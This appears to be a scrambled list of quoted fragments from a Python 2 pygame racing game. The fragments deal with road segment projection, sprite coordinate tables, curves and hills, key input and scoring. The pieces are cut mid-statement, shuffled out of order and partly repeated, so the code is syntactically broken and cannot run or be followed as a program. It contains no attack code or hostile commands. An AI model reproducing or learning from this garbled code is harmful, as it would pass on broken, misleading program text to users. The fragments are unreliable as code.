0", "# NOTE: objs will be deleted at rd_sprts_del_all_objs() ##del self.rd_sprt_objs[obj_k]", "main(): #sf = GMFlatpath('flatpath <:::>', 640, 480) sf = GMFlatpath('flatpath", "5, 'y': 1097, 'w': 240, 'h': 155 }, 'CACTUS': {", "pos=None): if pos is None: pos = self.position i =", "= float(curve) / rad a *= 10.0 #print a if", "80, 'h': 45 }, 'PLAYER_UPHILL_STRAIGHT': { 'x': 1295, 'y': 1018,", "self.seg_len) ''' #x# zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1", "[] # <1> #for i, seg in enumerate(self.segments): # <2>", "#if not x_i_saved: # info['x_i'] = x_i # x_i_saved =", "if zc == 0.0: #yp = float('inf') #yp = 2", "xcl1 = xc1 - self.lane_w xcl2 = xc2 + self.lane_w", "= int(pos / self.seg_len) #x#i = int(utils.math_round(pos / self.seg_len)) #i", "self.draw_on() self.rd_seg_render() self.update_world() self.check_if_car_out_road() self.check_score() self.check_tm() self.update_bg() def check_player_di(self, e_keys_dn,", "*args, **kwargs): self.fill(consts.GREEN) self.pygm.draw.circle(self.surf, consts.WHITE, (self.size[0] / 2, self.size[1] /", "IMG_POS_BACKGROUND['SKY']) self.bg_sky2.rect.top = 0 self.bg_sky2.rect.left = self.bg_sky1.rect.width self.disp_add(self.bg_sky2) self.bg_hills1 =", "xsr4, ys4, xsr3, ys3, seg['color']['rumble']) # for test #self.pygm.draw.circle(self.surf, consts.BLUE,", "= { 'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG':", "obj: obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0]) info['obj'] = obj self.disp_add(obj) ''' #", "- yw2 #print yw1, yw2 xp1 = self.xc_to_xp(xc1, self.d, zc1)", "self.bg_sky1.rect.top = 0 self.bg_sky1.rect.left = 0 self.disp_add(self.bg_sky1) self.bg_sky2 = FPSptBg('img_flatpath/images/background.png',", "< self.seg_draw_n / 2: if i < self.seg_draw_n / 4:", "(zw2 - self.camera_z) xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 =", "xsr2, (xsr1 + xsl1) / 2.0, (xsr2 + xsl2) /", "= 4.0#2.0#1.0# cv_s = 0 cv_l = 0.0 pnts.append([x, y])", "segs = utils.json_loads(s) return segs def rd_seg_render__1_o(self): \"\"\"straight\"\"\" xc1 =", "self.rd_sprt_objs = {} self.rd_sprt_cache = [] # for sprites render", "x_i == 0: sprt_at = 40 elif x_i == 1:", "k == self.pglc.K_d: return 3 else: return None def check_key(self,", "i # <3> xx1 = rad1 * math.cos(engi * i)", "+ xp return xs def yp_to_ys(self, yp, h): #ys =", "2.0 + xp return xs def yp_to_ys(self, yp, h): #ys", "-1.0 elif a > 1.0: a = 1.0 #tht_d =", "theta_i = math.pi /180.0 * 0.9 #theta_i = 0.0 #xc1", "10: print '>>> ', i print 'curve', seg.get('curve', 0.0) print", "self.car.rect.width * 2 sprt_at = 10000 if x_i == 0:", "random.randint(10, 40) hold = random.randint(10, 40) leave = random.randint(10, 40)", "road_reset(self): self.road.rd_reset() self.rdmap_reset() def road_reset_keep_segs(self): self.road.rd_reset(init=False, keep_segs=True) def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'):", "'w': 235, 'h': 118 }, 'BUSH2': { 'x': 255, 'y':", "FPSptProgress((4, 100), c_prog=consts.YELLOW) self.prog.rect.top = 70#340 self.prog.rect.left = 610 #self.prog.rotate(180)", "self.xp_to_xs(xp2, self.w) xp3 = self.xc_to_xp(xc3, self.d, zc2) xs3 = self.xp_to_xs(xp3,", "200.0#100.0#20.0#60.0#200.0# self.road_w = 2400#2000#600.0#200.0#1000.0#200# self.camera_h = 500.0#1000.0# self.speed_max = 300.0#180.0#200.0#100.0", "10: print xs1, ys1, xs2, ys2 print xs4, ys4, xs3,", "= 0.0 self.zc = 0.0 ## self.xp = 0.0 self.yp", "def util_ease_out(self, a, b, percent): return a + (b -", "# <2> seg_n = len(self.segments) segbi = self.get_seg_base_i() #print 'segbi',", "seg_scale = self.geo_prjc_scale(self.d, zc1) x_rnd = random.randint(1, self.road_w / 2", "self.d, zc2) xsr3 = self.xp_to_xs(xpr3, self.w) xpr4 = self.xc_to_xp(xcr4, self.d,", "'w': 298, 'h': 190 }, 'BOULDER2': { 'x': 621, 'y':", "return p_curve = self.player_seg.get('curve', 0.0) #p_curve = 3 #print 'p_curve',", "self.xp_to_xs(xpl4, self.w) self.render_polygon(None, xs1, ys1, xsl1, ys1, xsl3, ys3, xs3,", "- percent, 2)) def util_ease_in_out(self, a, b, percent): return a", "xcr1 = self.lane_w - self.player_x xcr2 = -self.lane_w - self.player_x", "#theta_i = math.pi /180.0 * 0.5 theta_i = math.pi /180.0", "consts from starfish import sptdraw from starfish import utils IMG_POS_BACKGROUND", "from down to up self.pygm.draw.rect(self.surf, self.c_prog, [1, self.size[1] - y,", "/ 2) < sprt_x < (car_x + car_w / 2):", "e_keys_dn: self.player_di = 1 elif 3 in e_keys_dn: self.player_di =", "xsl1, xsl2] #x_sprt = xsr1 x_sprt = (xsr1 + xsl1)", "+ dx_curve dx_curve = dx_curve + seg.get('curve', 0.0) # for", "def refresh(self, fps_clock, *args, **kwargs): self.rdpsd.lbl_set(str(int(self.road.speed))) self.scr.lbl_set(str(int(self.road.score))) self.tm_once.lbl_set(str(int(self.road.tm_last_once))) prg =", "in ['sprites']: seg_c[k] = v else: seg_c[k] = [] for", "/ 2 + sprt_w / 2 #if (car_x + car_w", "a, b, percent): return a + (b - a) *", "[x1, y1-d]] #pnts = [[x1, y1+a], [x2, y2+a], [x3, y3+a],", "seg_n #print si seg = self.segments[si] #x#zw1 = (i+1)*self.seg_len #zw2", "{'imgs': ['img_sprts/i_chest1.png'], 'score': 100,}, 'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,}, 'coin5':", "pass else: try: obj.scale(scale) except: #print 'scale <2>', scale pass", "(ys1 + ys3) / 2.0 x_dt = x_rnd * seg_scale", "in enumerate(sprts): sprt = info['name'] obj_k = str(seg['index']) + '_'", "def rd_get_segs(self, whole=False): if whole: segs = self.segments else: segs", "xs2, ys2, xsl2, ys2, xsl4, ys4, xs4, ys4, seg['color']['rumble']) xpr1", "'HARD': 6 }, 'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40,", "self.w) xp4 = self.xc_to_xp(xc4, self.d, zc2) xs4 = self.xp_to_xs(xp4, self.w)", "= -40 elif x_i == 2: sprt_at = 580 elif", "= c_bg self.c_prog = c_prog self.progress(0.0) def progress(self, prog): y", "self.lane_w xcl2 = xc2 + self.lane_w xcl3 = xc3 -", "0.0, 0.0) def rd_seg_init_rand_curve(self, n=5): #print 'rd_seg_init_rand', n for i", "prms_reset(self, keep_segs=False): self.e_keys_up = [] self.e_keys_dn = [] self.camera_x =", "xc4 + self.lane_w xcr1 = self.lane_w - self.player_x xcr2 =", "if self.position > self.track_len: self.position -= self.track_len #''' self.draw_on() self.rd_seg_render()", "#segnrand = random.randint(3, 30) segnrand = random.randint(2, 6) # for", "0 if 2 in e_keys_up: if self.player_go != 1: self.player_go", "def util_ease_in(self, a, b, percent): return a + (b -", "['obj']: spr_n[sk] = sv else: spr_n[sk] = None seg_c[k].append(spr_n) segs_c.append(seg_c)", "60.0#30.0#20.0 self.last_seg_i = 0 self.score = 0 self.game_over = False", "pnts return pnts def draw_segs(self, segs, rad): pnts = self.get_segs_pnts(segs,", "if self.player_di != 3: self.player_di = 0 if 3 in", "1:> 2:v 3:< self.player_go = 0 # 0:- 1:^ 2:v", "['img_sprts/ashra_defeat1.png'], 'score': -100,}, #'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,}, #'dinof': {'imgs':", "3 else: return None def key_to_di_b(self, k): if k ==", "== 0.0: if cv_s: tht_d = self.cv_to_engl(cv_l, rad) #tht +=", "FP_ROAD_SPRTS = { 'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,}, 'coin1': {'imgs':", "self.disp_add(self.lb1) ''' def handle_event(self, events, *args, **kwargs): return events def", "'w': 80, 'h': 45 }, 'PLAYER_LEFT': { 'x': 995, 'y':", "= 0 self.straight.rect.left = 0 self.disp_add(self.straight) '''' self.sn1 = SptTmpx((200,", "segnrand = random.randint(2, 6) # for a3c train self.rd_seg_init_rand(segnrand) #", "#self.score -= 1 #if self.score < 0: # self.score =", "random.random() * 6.0 yw = 0.0 self.add_road(enter, hold, leave, curve,", "fi: s = fi.read() segs = utils.json_loads(s) return segs def", "1 in e_keys_dn: self.player_di = 1 elif 3 in e_keys_dn:", "FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE}, 'FINISH': {'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK,", "= seg['p2']['world'].get('y', 0.0) yc1 = yc - yw1 yc2 =", "0.0 self.zw = 0.0 self.xc = 0.0 self.yc = 0.0", "y4, color): #d = 200#100#240#50# #a = 60 #pnts =", "test #o = SptTmpx((40, 40)) #return o class FPSptRoadB(sptdraw.SptDrawBase): def", "e_keys_dn: self.player_go = 1 elif 2 in e_keys_dn: self.player_go =", "ys3 print '-' * 30 ''' # grass self.render_polygon(None, 0,", "self.position = 0.0 self.player_x = 0.0#100.0#1000.0# self.centrifugal = 0.1#0.06#0.08#0.01#0.3 self.player_seg", "__file__) self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file) self.rdmap_reset() def road_segs_to_file(self, segs_file=None): if not", "* math.cos(engi * (i + 1)) xc1 = (rad -", "0.0: #yp = float('inf') #yp = 2 ** 64 yp", "def __init__(self, img_file, pos, *args, **kwargs): super(FPSptBg, self).__init__(img_file, pos) class", "ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render(self):", "return 1 elif k == self.pglc.K_DOWN: return 2 elif k", "1 #if self.score < 0: # self.score = 0 self.game_over", "'y': 375, 'w': 300, 'h': 170 }, 'BILLBOARD06': { 'x':", "2.0#4.0#6.0 self.speed_dt_na = 1.0#3.0 self.player_x_dt = 60.0#30.0#20.0 self.last_seg_i = 0", "elif k == self.pglc.K_SPACE or k == self.pglc.K_v or k", "190 }, 'BILLBOARD05': { 'x': 5, 'y': 897, 'w': 298,", "get_seg_base_i(self, pos=None): if pos is None: pos = self.position i", "= x_curve + dx_curve dx_curve = dx_curve + seg.get('curve', 0.0)", "in range(n): rct = [0, i * d, self.size[0], d]", "pygm.SptLbl('hello,', c=consts.GREEN, font_size=32) self.lb1.rect.top = 200 self.lb1.rect.left = 100 self.disp_add(self.lb1)", "= 312 self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16) self.scr.rect.top =", "rad #self.fill(consts.WHITE) self.draw_segs(self.segs, self.rad) def xy_to_cntr(self, x, y): return [self.size[0]", "self.add_road(num, num, num, 0, height) self.add_road(num, num, num, 0, 0)", "len(self.segments) segbi = self.get_seg_base_i() print 'segbi', segbi # TODO: do", "80, 'h': 56 }, 'PLAYER_UPHILL_LEFT': { 'x': 1383, 'y': 961,", "FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY'])", "self.size[1] / 2), self.size[0] / 2, 0) class SptTmpi(pygm.SptImg): def", "0.0 #xc1 = self.road_w / 2 - self.player_x #xc2 =", "- sky.rect.width > 0: sky.rect.left -= sky.rect.width * 2 for", "k == self.pglc.K_SPACE: # hide / show road map self.rdmap_hide()", "#''' if self.player_di == 3: # < self.player_x -= 9", "'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM': 4, 'HARD': 6 },", "{ 'x': 5, 'y': 897, 'w': 298, 'h': 190 },", "forward forever. http://codeincomplete.com/posts/javascript-racer/ http://www.extentofthejam.com/pseudo/ http://pixel.garoux.net/screen/game_list Usage: * UP/DOWN/LEFT/RIGHT * SPACE", "def refresh__1(self, fps_clock, *args, **kwargs): #print '>>> refresh' #''' if", "ys3, seg['color']['rumble']) self.render_polygon(None, xs2, ys2, xsl2, ys2, xsl4, ys4, xs4,", "621, 'y': 897, 'w': 298, 'h': 140 }, 'TREE2': {", "not None: e_keys_dn.append(di) else: r_events.append(event) else: r_events.append(event) self.e_keys_up = e_keys_up", "cfg self.bg_sky1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky1.rect.top = 0 self.bg_sky1.rect.left =", "*args, **kwargs): #print '>>> ', events if not self.flag_check_event: return", "xp_to_xs(self, xp, w): #xs = w / 2.0 + w", "}, 'DEAD_TREE2': { 'x': 1205, 'y': 490, 'w': 150, 'h':", "hill.rect.left + hill.rect.width < 0: hill.rect.left += hill.rect.width * 2", "**kwargs): #print '>>> refresh' #''' if self.player_di == 3: #", "ys2 = ys1 yp3 = self.yc_to_yp(yc2, self.d, zc2) ys3 =", "seg.get('curve', 0.0) # for hills yw1 = seg['p1']['world'].get('y', 0.0) yw2", "/ 20 n = seg_n / random.randint(10, 30) for i", "((-math.cos(percent * math.pi)/2) + 0.5) def util_curve_percent_remaining(self, n, total): return", "i = int(pos / self.seg_len) #x#i = int(utils.math_round(pos / self.seg_len))", "for i in range(n): j = random.randint(10, seg_n - 10)", "random.randint(1, self.road_w / 2 - 10) * seg_scale #x_sprt =", "if seg_n == 0: return 0.0 else: return self.segments[seg_n -", "for i, seg in enumerate(self.segments): zw1 = seg['p1']['world']['z'] zw2 =", "+ str(int(time.time())) + '.txt' segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_seg_json_save(segs_file) def", "xpl3 = self.xc_to_xp(xcl3, self.d, zc2) xsl3 = self.xp_to_xs(xpl3, self.w) xpl4", "% seg_n] # for test #self.base_seg['color'] = FP_COLORS['FINISH'] b_curve =", "return [self.size[0] / 2 + x, self.size[1] / 2 -", "pnts = [] x, y = 0.0, 0.0 tht =", "0.0 else: return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0) def rd_seg_init_rand(self, n=50):", "* self.seg_len, 'y': yw}, 'camera': {}, 'screen': {}}, 'curve': curve,", "'w': 215, 'h': 220 }, 'STUMP': { 'x': 995, 'y':", "y', seg['p1']['world'].get('y', 0.0) #print '-' * 30 ''' ''' #x#", "new road TODO: * hill road * more road sprites", "#print event if event.type == self.pglc.KEYUP: di = self.key_to_di(event.key) if", "handle_event(self, events, *args, **kwargs): #return events r_events = [] for", "cpnts = [self.xy_to_cntr(p[0], p[1]) for p in pnts] c =", "2 == 0: #if n % 4 == 0: c", "+ 1) dx1 = self.seg_len * math.tan(theta1) dx2 = self.seg_len", "0.0 yw = 0.0 #elif p < 0.8: # curve", "= kwargs.get('road_file') if road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file) def main(): #sf = GMFlatpath('flatpath", "elif a > 1.0: a = 1.0 #tht_d = math.acos(a)", "ys1, xs2, ys2, xs4, ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__4_o(self):", "0.0: return 1.0 else: return d / zc def xc_to_xp(self,", "obj.rect.left sprt_w = obj.rect.width car_x = self.player_x car_w = self.car.rect.width", "> 0: sky.rect.left -= sky.rect.width * 2 if self.speed <=", "+= int(self.sky_speed * p_dt) # always move the cloud #sky.rect.left", "= 0.0 yw = 0.0 #elif p < 0.8: #", "create at render ##'x_i': None, # get real (random) x", "IMG_POS_BACKGROUND['TREES']) self.bg_trees1.rect.top = 0 self.bg_trees1.rect.left = 0 self.disp_add(self.bg_trees1) self.bg_trees2 =", "to create at render ##'x_i': None, # get real (random)", "- x_curve xcr3 = xcr3 - x_curve - dx_curve xcr4", "0 self.game_over = True self.game_score = -1.0 def check_score(self): #", "render ##'x_i': None, # get real (random) x from x_pos", "= self.road_w / 2 #x_pos = [rd_w_half + self.lane_w, #", "'w': 200, 'h': 315 }, 'BILLBOARD01': { 'x': 625, 'y':", "elif self.speed > self.speed_max: self.speed = self.speed_max self.position += self.speed", "'pot1': {'imgs': ['img_sprts/i_pot1.png'], 'score': -5,}, 'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,},", "self.position zc2 = zw2 - self.camera_z - self.position # for", "#''' self.position += 10.0#5.0#1.0 self.position += random.randint(2, 10) if self.position", "y = 0.0, 0.0 tht = 0.0 rad_m = 4.0#2.0#1.0#", "self.yp_to_ys(yp1, self.h) ys2 = ys1 yp3 = self.yc_to_yp(yc, self.d, zc2)", "class FPSptRdSprts(pygm.SptImg): def __init__(self, img_file, *args, **kwargs): super(FPSptRdSprts, self).__init__(img_file) @classmethod", "keep_segs=False, segs_file=None): #if not init and not keep_segs: if not", "y1+a], [x2, y2+a], [x3, y3+a], [x4, y4+a], [x1, y1+a]] #", "self.position # <2> seg_n = len(self.segments) segbi = self.get_seg_base_i() #print", "**kwargs): super(FPSptRoadB, self).__init__(size) self.cfg = cfg self.car = kwargs.get('car') self.bg_sky", "d, zc): if zc == 0.0: #yp = float('inf') #yp", "self.road_w / 2 yc = self.camera_h print '=' * 80", "pnts if len(pnts) <= 1: return #if len(pnts) > 0:", "FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK}, 'START_Y': {'road': FP_COLOR_YELLOW, 'grass': '#10AA10', 'rumble': '#555555',", "try: obj.scale(scale) except: #print 'scale <2>', scale pass x_i_saved =", "'w': 80, 'h': 45 }, 'PLAYER_UPHILL_RIGHT': { 'x': 1385, 'y':", "# car disp add after road #self.road = FPSptRoad((640, 240),", "rl * FP_ROAD['CURVE']['MEDIUM']) elif p < 0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "seg_n - 10) sprt = random.choice(FP_ROAD_SPRTS.keys()) s = { 'name':", "sprt = info['name'] obj_k = str(seg['index']) + '_' + str(i)", "== 3: #self.player_x -= self.player_x_dt self.player_x -= self.speed / 5", "a *= 10.0 #print a if a < -1.0: a", "= (xs1 + xs2) / 2.0 #y_sprt = (ys1 +", "self.yc_to_yp(yc, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h) ys2 = ys1", "self.seg_draw_n / 2: if i < self.seg_draw_n / 4: theta1", "= sprt.get('obj') if not obj: # None or 0 return", "'h': 144 }, 'TRUCK': { 'x': 1365, 'y': 644, 'w':", "yw1 yc2 = yc - yw2 #print yw1, yw2 xp1", "995, 'y': 531, 'w': 80, 'h': 41 } } FP_COLOR_WHITE", "y3+a], [x4, y4+a], [x1, y1+a]] # reflect the y- d", "= random.random() * 10.0 else: curve = rl * random.random()", "car_w / 2 + sprt_w / 2 #if (car_x +", "scr = sprt.get('score') if not scr: # None or 0", "'>>> ', i print 'curve', seg.get('curve', 0.0) print 'world z',", "= (640 - self.car.rect.width) / 2 ##self.disp_add(self.car) # car disp", "'h': 295 }, 'BILLBOARD04': { 'x': 1205, 'y': 310, 'w':", "= len(self.segments) segbi = self.get_seg_base_i() print 'segbi', segbi self.player_seg =", "= kwargs.get('bg_trees') self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass']) self.rd_reset(init=True) self.add_fog()", "+ w_half): self.score += scr def check_tm(self): if self.position >", "for test if i < 10: print xs1, ys1, xs2,", "['img_sprts/rock_r2.png'], 'score': -50,}, #'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,}, #'bear': {'imgs':", "- x_curve - dx_curve xc4 = xc4 - x_curve -", "x_curve = 0 # <1> #for i, seg in enumerate(self.segments):", "0, ys1, self.w, ys2, self.w, ys4, 0, ys3, seg['color']['grass']) #", "self.yc_to_yp(yc1, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h) ys2 = ys1", "rad2 * math.cos(engi * (i + 1)) xc1 = (rad", "* self.seg_len except Exception as e: print e self.init_rd_segs_rand_1() else:", "seg in segs: if not seg['sprites']: segs_c.append(seg) else: seg_c =", "* 2: if self.tm_start == 0.0: self.tm_start = time.time() self.tm_end", "% seg_n #print si seg = self.segments[si] #''' ''' #x#", "= len(self.segments) * self.seg_len except Exception as e: print e", "= seg['p2']['world']['z'] zc1 = zw1 - self.camera_z - self.position zc2", "230, 'y': 5, 'w': 385, 'h': 265 }, 'TREE1': {", "'x': 621, 'y': 897, 'w': 298, 'h': 140 }, 'TREE2':", "== 0.0: #xp = float('inf') #xp = 2 ** 64", "= 300#200 #self.seg_draw_n = 200#150 self.seg_draw_n = 70#100#200#150 self.speed =", "elif k == self.pglc.K_RIGHT: return 1 elif k == self.pglc.K_DOWN:", "self.lb1.rect.left = 100 self.disp_add(self.lb1) ''' def handle_event(self, events, *args, **kwargs):", "{'NONE': 0, 'LOW': 20, 'MEDIUM': 40, 'HIGH': 60 }, }", "'BILLBOARD08': { 'x': 230, 'y': 5, 'w': 385, 'h': 265", "2, 'MEDIUM': 4, 'HARD': 6 }, 'HILL': {'NONE': 0, 'LOW':", "= (i + seg_n) % seg_n return i def rd_get_segs(self,", "'score': 10,}, 'heart': {'imgs': ['img_sprts/i_heart.png'], 'score': 50,}, 'pot1': {'imgs': ['img_sprts/i_pot1.png'],", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "'PLAYER_UPHILL_STRAIGHT': { 'x': 1295, 'y': 1018, 'w': 80, 'h': 45", "ys1 yp3 = self.yc_to_yp(yc2, self.d, zc2) ys3 = self.yp_to_ys(yp3, self.h)", "'grass': '#009A00', 'rumble': '#BBBBBB' }, 'START': {'road': FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE,", "return yp def xp_to_xs(self, xp, w): #xs = w /", "result += mx return result def util_ease_in(self, a, b, percent):", "xs2 = self.xp_to_xs(xp2, self.w) xp3 = self.xc_to_xp(xc3, self.d, zc2) xs3", "'x': 1295, 'y': 1018, 'w': 80, 'h': 45 }, 'PLAYER_UPHILL_RIGHT':", "seg in enumerate(self.segments): zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1", "+ self.lane_w, # rd_w_half - self.lane_w] sprt_x = obj.rect.left sprt_w", "'x': 1365, 'y': 490, 'w': 122, 'h': 144 }, 'TRUCK':", "= random.randint(-100, 100) #print p_dt for sky in self.bg_sky: #print", "= start + increment while (result >= mx): result -=", "self.road.track_len self.prog.progress(prg) spdc = self.road.speed / self.road.speed_max self.spd.progress(spdc) class FPSceneA(pygm.PyGMScene):", "rad1 * math.cos(engi * i) xx2 = rad2 * math.cos(engi", "self.seg_draw_n) * self.seg_len def seg_lasy_y(self): seg_n = len(self.segments) if seg_n", "2 elif k == self.pglc.K_LEFT: return 3 else: return None", "- obj.rect.width / 2 #obj.scale(scale) info['obj'] = obj ##self.disp_add(obj) #", "self.rd_sprt_objs[obj_k] img = FP_ROAD_SPRTS[sprt]['imgs'][0] obj = FPSptRdSprts.create_by_img(img) # avoid: pygame.error:", "not None: e_keys_up.append(di) else: r_events.append(event) elif event.type == self.pglc.KEYDOWN: di", "self.seg_draw_n engi = math.pi / 2.0 / 60#10#20 rad =", "return pnts def get_segs_pnts_1(self, segs, rad): pnts = [] x,", "e_keys_dn: self.player_di = 3 if 0 in e_keys_up: if self.player_go", "in range(hold): self.rd_seg_add(curve, self.util_ease_out(start_y, end_y, (float(n)+enter)/total)) for n in range(leave):", "def handle_event(self, events, *args, **kwargs): #return events r_events = []", "if not obj: # None or 0 return #rd_w_half =", "y', self.player_seg['p1']['world'].get('y', 0.0) # clear the sprites cache self.rd_sprt_cache =", "3: sprt_at = -580 elif x_i == 4: sprt_at =", "}, 'BILLBOARD04': { 'x': 1205, 'y': 310, 'w': 268, 'h':", "= 0 self.bg_hills1.rect.left = 0 self.disp_add(self.bg_hills1) self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS'])", "'CAR03': { 'x': 1383, 'y': 760, 'w': 88, 'h': 55", "* self.seg_len) total = enter + hold + leave for", "pygame.error: Width or height is too large if scale >", "else: cv_s = 1 continue x += rad_m * math.cos(tht)", "200 self.lb1.rect.left = 100 self.disp_add(self.lb1) ''' def handle_event(self, events, *args,", "30) for i in range(n): j = random.randint(10, seg_n -", "else: r_events.append(event) self.e_keys_up = e_keys_up self.e_keys_dn = e_keys_dn return r_events", "event if event.type == self.pglc.KEYUP: di = self.key_to_di(event.key) if di", "xc3 = xc3 - x_curve - dx_curve xc4 = xc4", "== self.camera_h self.xw = 0.0 self.yw = 0.0 self.zw =", "2 or \\ self.player_x > self.road_w / 2: self.speed -=", "'w': 150, 'h': 260 }, 'BOULDER1': { 'x': 1205, 'y':", "(xsr1 + xsl1) / 2.0, (xsr2 + xsl2) / 2.0,", "20 elif self.player_di == 3: #self.player_x -= self.player_x_dt self.player_x -=", "20.0#10.0#50.0# cv_s = 0 cv_l = 0.0 else: rad_m =", "5, 'w': 1280, 'h': 480 }, 'SKY': { 'x': 5,", "= (rad - xx1) - self.player_x xc2 = (rad -", "mn, mx): return max(mn, min(value, mx)) def util_accelerate(self, v, accel,", "0 self.disp_add(self.bg_sky1) self.bg_sky2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky2.rect.top = 0 self.bg_sky2.rect.left", "#self.pygm.draw.circle(self.surf, consts.BLUE, # (int(xsr1), 116 - int(ys1)), # 3, 0)", "bk_im = utils.dir_abs('starfish/data/img_bk_1.jpg', __file__) #self.bk = pygm.SptImg('data/img_bk_1.jpg') self.bk = pygm.SptImg(bk_im)", "= kwargs.get('car') self.bg_sky = kwargs.get('bg_sky') self.bg_hills = kwargs.get('bg_hills') self.bg_trees =", "keep_segs=False): self.e_keys_up = [] self.e_keys_dn = [] self.camera_x = 0.0", "'h': 265 }, 'TREE1': { 'x': 625, 'y': 5, 'w':", "self.get_seg_base_i() print 'segbi', segbi self.player_seg = self.segments[segbi] b_curve = self.player_seg.get('curve',", "is None: return scr = sprt.get('score') if not scr: #", "seg in segs: curve = seg.get('curve', 0.0) if curve ==", "- self.player_x yc = self.camera_h print '=' * 80 print", "== self.pglc.K_d: return 3 else: return None def check_key(self, events):", "up self.pygm.draw.rect(self.surf, self.c_prog, [1, self.size[1] - y, self.size[0] - 2,", "- i) self.c[3] = ca self.pygm.draw.rect(self.surf, self.c, rct) class FPSptRdSprts(pygm.SptImg):", "xc, d, zc): if zc == 0.0: #xp = float('inf')", "img_file, *args, **kwargs): super(SptTmpi, self).__init__(img_file) class FPSptBg(pygm.SptImgOne): def __init__(self, img_file,", "/ random.randint(10, 30) for i in range(n): j = random.randint(10,", "i = (i + seg_n) % seg_n return i def", "import consts from starfish import sptdraw from starfish import utils", "== 1: sprt_at = -40 elif x_i == 2: sprt_at", "xsl4 = self.xp_to_xs(xpl4, self.w) self.render_polygon(None, xs1, ys1, xsl1, ys1, xsl3,", "'w': 80, 'h': 41 }, 'PLAYER_RIGHT': { 'x': 995, 'y':", "19 if self.player_x > 1000: self.player_di = 3 #''' #'''", "- self.lane_w] sprt_x = obj.rect.left sprt_w = obj.rect.width car_x =", "self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass']) self.rd_reset(init=True) self.add_fog() def prms_reset(self, keep_segs=False): self.e_keys_up =", "- self.position #zc1 = self.position - (zw1 - self.camera_z) #zc2", "'x': 1385, 'y': 1018, 'w': 80, 'h': 45 }, 'PLAYER_LEFT':", "self.player_x = 0.0#100.0#1000.0# self.centrifugal = 0.1#0.06#0.08#0.01#0.3 self.player_seg = None self.base_seg", "= seg['p2']['world']['z'] ''' zw1 = (i+1)*self.seg_len zw2 = (i+2)*self.seg_len zc1", "add after road #self.road = FPSptRoad((640, 240), self.cfg) self.road =", "util_limit(self, value, mn, mx): return max(mn, min(value, mx)) def util_accelerate(self,", "+ i) % seg_n #print si seg = self.segments[si] #'''", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM'])", "**kwargs) self.straight = FPStraight({}) self.straight.rect.top = 0 self.straight.rect.left = 0", "sprt_w / 2 #if (car_x + car_w / 2) <", "= 0 self.disp_add(self.bg_trees1) self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees2.rect.top = 0", "FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], 